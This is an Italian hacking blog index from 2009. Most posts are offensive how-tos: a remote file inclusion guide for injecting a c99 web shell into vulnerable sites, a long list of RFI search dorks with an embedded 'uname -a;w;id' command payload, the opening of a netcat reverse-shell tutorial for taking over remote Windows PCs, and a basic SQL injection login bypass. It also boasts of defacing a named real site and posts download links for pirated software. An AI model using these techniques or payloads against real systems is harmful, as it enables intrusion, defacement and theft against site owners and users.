Duffabio - Hacking Blog

Posted on 14/8/2009, 11:43 by: Duffabio

Emule Acceleration Patch v5.4.2

Nome:Emule.Acceleration.Patch.v5.4.2.Incl.Patch-SkN
Dimensioni:6 Mb

Descrizione:
Programma che permette di velocizzare i download di emule..Per ora sembra funzionare..
Si collega più velocemente anche a edonkey server 2 che mi dava sempre problemi..

Download:

CODICE

http://rapidshare.com/files/266152613/Emule.Acceleration.Patch.v5.4.2.rar

Password:

CODICE

skinnycap

Tags: eMule, Software

Comments: 0 | Views: 91

Last Post by: Duffabio (14/8/2009, 11:43)

[XSS] NexShell

Posted on 6/4/2009, 14:56 by: Duffabio

XSS su NexShell
[fixed]

XSS su NexShell

Edited by Duffabio - 6/4/2009, 18:51

Tags: Cross-site scripting

Comments: 0 | Views: 108

Last Post by: Duffabio (6/4/2009, 14:56)

Guida alle RFI, (Remote File Inclusion)

Posted on 4/4/2009, 15:08 by: Duffabio

Guida RFI (Remote File Inclusion).
Guida di Duffabio.
Difficoltà: Bassa.

Piccola Parte Teorica
Una RFI è una tecnica in cui viene incluso un file (come si capisce dal nome) da remoto.

CODICE

index.com?pag=file.php

$var=$_GET['pag'];
include('$var');

Questo codice in PHP assegna il valore file.php alla variabile "var".

Come Usare La Shell
Noi possiamo usufruire di questo caso usando una Shell (io uso la c99).
Allora per usare la shell c99 (prenderemò in considerazione questa shell) dovete per prima cosa metterla su un vostro spazio web (Altervista) in formato .txt

Trovare I Siti Vulnerabili:
Fatto questo basta trovare con l'ausilio di QUESTE DORK un sito vulnerabile.
I siti vulnerabili dovrebbero essere di questo tipo:

CODICE

http://sitovulnerabile.php?page=story.php
http://sitobucato.com?x=tools.php

Impostare Una RFI
Trovato il sito vulnerabile alle RFI bisogna cancellare la parte dopo il segno "=" e inserire il link della nostra shell che andremmo a includere nella pagina vulnerabile.
Esempio:

CODICE

http://sitovulnerabile.com?page=[LINK DELLA TUA SHELL c99]
http://sitobucato.com?x=[LINK DELLA TUA SHELL c99]

Ricordatevi sempre di usare un Proxy oppure Tor in modo da coprire il vostro IP.

Edited by Duffabio - 25/8/2009, 11:59

Tags: Hacking

Comments: 0 | Views: 202

Last Post by: Duffabio (4/4/2009, 15:08)

Dork per RFI

Posted on 31/3/2009, 20:56 by: Duffabio

Molte Dork For RFI:

CODICE

/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www&#...

Read the entire post...

Tags: Hacking

Comments: 4 | Views: 62919

Last Post by: Duffabio (22/9/2009, 15:57)

Meditric.com, Deface

Posted on 31/3/2009, 18:49 by: Duffabio

Ecco un Deface sfruttando una RFI (Remote File Inclusion)

Questo è il link del sito: http://meditric.com/

Questo è uno Screen del Deface:

SPOILER (clicca per visualizzare)

Edited by Duffabio - 5/4/2009, 11:26

Tags: Defacing

Comments: 0 | Views: 128

Last Post by: Duffabio (31/3/2009, 18:49)

MAC OS LEOPARD 1.5.5 iDENEB, Per PC con processore AMD e INTEL

Posted on 29/3/2009, 09:24 by: Duffabio

Proprio cosi ragazzi una versione completa di Leopard 1.5.5 che gira sui normali pc con processore Intel e Amd

Requisiti minimi:

Processore 1.80 ghrz ( AMD O INTEL CON ISTRUZIONE SEE3 SEE2 CONTROLLATE CON CPU Z)
Ram : 512mb
Hd: un Hard disk SATA o IDE con almeno 16 gb di spazio libero
DVD: Un lettore DVD sata o ide

Ora controllate la compatibilità con QUESTO LINK

DOWNLOAD:

CODICE

http://www.megaupload.com/?d=SFXJ1NS9
http://www.megaupload.com/?d=YEWQSAZ3
http://www.megaupload.com/?d=Y4FW6KK7
http://www.megaupload.com/?d=PVJOKQWA
http://www.megaupload.com/?d=59ILEVSR
http://www.megaupload.com/?d=8Q9HSSHH
http://www.megaupload.com/?d=BIU80YMB
http://www.megaupload.com/?d=7QWI4H34
http://www.megaupload.com/?d=69TX2EUM
http://www.megaupload.com/?d=CINV7F63
http://www.megaupload.com/?d=2WJ0JWVI
http://www.megaupload.com/?d=B5I4RFPD
http://www.megaupload.com/?d=U42WVRYR
http://www.megaupload.com/?d=1H008KSP
http://www.megaupload.com/?d=BWP0ZYG7
http://www.megaupload.com/?d=72XEQ6R5
http://www.megaupload.com/?d=65IFT031
http://www.megaupload.com/?d=2ROFR3IB
http://www.megaupload.com/?d=Q10VHECO
http://www.megaupload.com/?d=SMZ9GJ80
http://www.megaupload.com/?d=LOH2IEYA
http://www.megaupload.com/?d=JC6WE9JN
http://www.megaupload.com/?d=78RLTBHH
http://www.megaupload.com/?d=II5LXKPU
http://www.megaupload.com/?d=LC8TAKOK
http://www.megaupload.com/?d=S2SVF8S3
http://www.megaupload.com/?d=E9AZ72MW
http://www.megaupload.com/?d=H7RYFS1M
http://www.megaupload.com/?d=LIBO6X34
http://www.megaupload.com/?d=GUB84KUD
http://www.megaupload.com/?d=V1ZS1I7T
http://www.megaupload.com/?d=YNR4JEHD
http://www.megaupload.com/?d=6SPAB1DC
http://www.megaupload.com/?d=ARG65R19
http://www.megaupload.com/?d=MZ72BZOI
http://www.megaupload.com/?d=EV020Q0Y

PATCH ITALIANO

Quando siete in Mac Andate sotto system pre...

Read the entire post...

Tags: Sistemi Operativi [S.O]

Comments: 0 | Views: 1785

Last Post by: Duffabio (29/3/2009, 09:24)

Modificare il tasto "Start" di XP

Posted on 27/3/2009, 15:28 by: Duffabio

Modificare il tasto "Start" di XP

Per modificare il pulsante Start dovete per prima cosa scaricare QUESTO TOOL
Poi facciamo partire l'EXE contenuto all'interno e si aprirà una finestra

Andate su file--> apri--> explorer.exe che trovate in C: \ WINDOWS \ explorer.exe
Vi dovrebbero apparire molte cartelle con a finaco delle stringhe

Andate sulla cartella 37 per poi aprire la sua sotto-directory "1033"

All'interno noterete varie righe di testo, ma a noi interessa solo il punto dove c'è scritto "start".
Ricordandovi di non levare le virgolette inserite la parola che volete inserire al posto di start. e premere il pulsante "compile script"
Mi raccomando di non modificare le altre linee.

Fatto tutto, andate su File --> Save As e salvatelo con il nome ExplorerHacked e chiudete il programma.

Ora ndate su start, "Esegui" e digitare "regedit", si aprira l'editor del Registro di sistema.
Cercate nel menù alla vostra sinistra HKEY_LOCAL_MACHINE --> SOFTWARE -->Microsoft --> Windows NT --> CurrentVersion --> WinLogon.
Sulla vostra destra dovreste trovare la voce che si intitola "Shell" , cliccateci sopra con il tasto destro e cliccate modifica ExplorerHacked.exe
Ora chiudete il registro di sistema e riavviate il PC.
Si dovrebbe vedere il vostro pulsante di avvio cambiato con il nome che avete inserito al posto di Start.
Se qualcuno avesse sbagliato non ci sono problemi cliccate ctrl+alt+canc.
Si aprira task manager di windows
In aplicazioni c'è un pulsantino "Nuova Operzione" in basso a destra, digitate explorer.exe e tornera come prima a quel punto rifate la procedura di nuovo o rimettete le impostazioni che avevate prima.

Ecco il mio "Pulsante Start"

SPOILER (clicca per visualizzare)

Tags: Vari Tutorial

Comments: 0 | Views: 304

Last Post by: Duffabio (27/3/2009, 15:28)

Guida alla creazione di una Reverse Shell, Come sovvertire un pc remoto e prendere il controllo del prompt dei comandi

Posted on 25/3/2009, 17:32 by: Duffabio

Reverse Shell (o anche Connect-back Shell, Shell al contrario)

Guida di 4815162342. Livello di difficoltà: medio-alto. Guida un pò lunghetta, ma di sicuro ne vale la pena

Una reverse shell è un tipo di attacco che permette di ottenere il prompt dei comandi di un sistema remoto con diritti amministrativi.

A differenza di una "direct shell", non è chi attacca che si collega al pc-vittima. Sarà bensì il pc-vittima che si collegherà al pc di chi attacca, fornendogli il prompt dei comandi.

Questo consente di ovviare ai già discussi problemi di "pass-through", ossia riuscire a sorpassare firewall, router e quant'altro blocchi le connessioni in ingresso verso il pc-vittima.

Il tutorial che segue cercherà di spiegare come impostare una reverse shell per ottenere il controllo del prompt dei comandi di sistemi remoti basati su Windows.

Strumenti necessari:

NetCat (nc.exe, network utility che permette di agganciare programmi in riga di comando e redirezionare l'input e l'output da e verso un sistema remoto)
WinRar (software utility di compressione / decompressione archivi; utilissimo per creare i famigerati archivi autoestraenti)
Editor del Registro di sistema (reg.exe, software utility di editazione del registro di windows da riga di comando)
WebGet (wget.exe, network utility che permette di scaricare qualsiasi file via HTTP o FTP direttamente da riga di comando)

Prerogative:

Iscrizione ad un servizio di DNS dinamici (tipo DynDNS, No-IP, etc.)
Installazione di un client Updater di DNS dinamici sul proprio PC
Apertura di una porta TCP (liberamente scelta) sul firewall del proprio PC
Eventualmente (se ci si collega ad internet con un router), forward della porta TCP che è stata scelta, dal router al proprio PC Client.

- PARTE 1 - Preparazione del proprio PC

Si inizia con l'iscrizione al servizio di DNS dinamici. I DNS dinamici sono necessari per poter "ritrovare" il nostro pc in internet senza dover ogni volta andare a controllare il nostro IP pubblico (che cambia, di tanto in tanto, essendo un IP dinamico).

In questo esempio si userà il servizio fonito da DynDNS.org [http://www.dyndns.org].

CREAZIONE HOST DYNDNS

Recarsi sul sito http://www....

Read the entire post...

Tags: Hacking

Comments: 0 | Views: 129

Last Post by: Duffabio (25/3/2009, 17:32)

SQL Injection, Tutorial by Duffabio

Posted on 22/3/2009, 15:45 by: Duffabio

La SQL INJECTION, è un iniezione di codice in un database, tramite queste iniezioni è possibile ottenere i privilegi su un qualsiasi sito vulnerabile.

Proviamo a prendere un login qualsiasi, se nel campo ‘userid’ o ‘username' si inseriscono il valore "Admin" e nel campo ‘password’ il valore "passprova", la query SQL risulterà cosi:

CODICE

SELECT * FROM tabella_utenti
WHERE userid = 'Admin'
AND password = 'passprova'

Questa query è esatta ma non è perfetta, proviamo invece a inserire una stringa ben strutturata, ad esempio nel campo ‘password’ inseriamo:
1' or '1' = '1

Ed ecco come risulterà la query:

CODICE

SELECT * FROM tabella_utenti
WHERE userid = 'Admin'
AND password = '1' OR '1' = '1'

La query SQL grazie all’uso di OR imporrà ‘1' = ‘1' in modo da aver accesso al database dell’amministrazione senza dover immettere i veri dati di accesso visto che l’uguaglianza si è verificata esatta.

Questa piccola guida è già stata scritta milioni di volte, io ho provato a riscriverla in modo più semplificato possibile utilizzando le mie piccole conoscenze..

Duffabio

Tags: Hacking

Comments: 0 | Views: 146

Last Post by: Duffabio (22/3/2009, 15:45)

Codice HTML per essere votati in TOP., Forumfree, Forumcommunity, Blogfree

Posted on 22/3/2009, 11:30 by: Duffabio

Bottone per essere votati in TOP

Se finite il mese in top200, allora potrete essere votati in top.
Se volete un bottone per far votare facilmente il vostro forum, inserirte questo codice (in qualunque zona su Amministrazione -> Gestione codice HTML):

CODICE

Modificare:
WWWWWWW con il servizio su cui si trova il forum:
(http://www.forumfree.net/ per Forumfree
http://top.forumcommunity.net/ per Forumcommunity
http://top.blogfree.net/ per Blogfree);
XXXXXXX con l'ID del sondaggio;
YYYYYYY con la posizone in cui si trova il forum nel sondaggio;
ZZZZZZZ con la scritta del bottone, ad esempio: "Votaci in Top Forum!"

Edited by Duffabio - 9/9/2009, 12:23

Tags: Forumfree/Forumcommunity

Comments: 0 | Views: 184

Last Post by: Duffabio (22/3/2009, 11:30)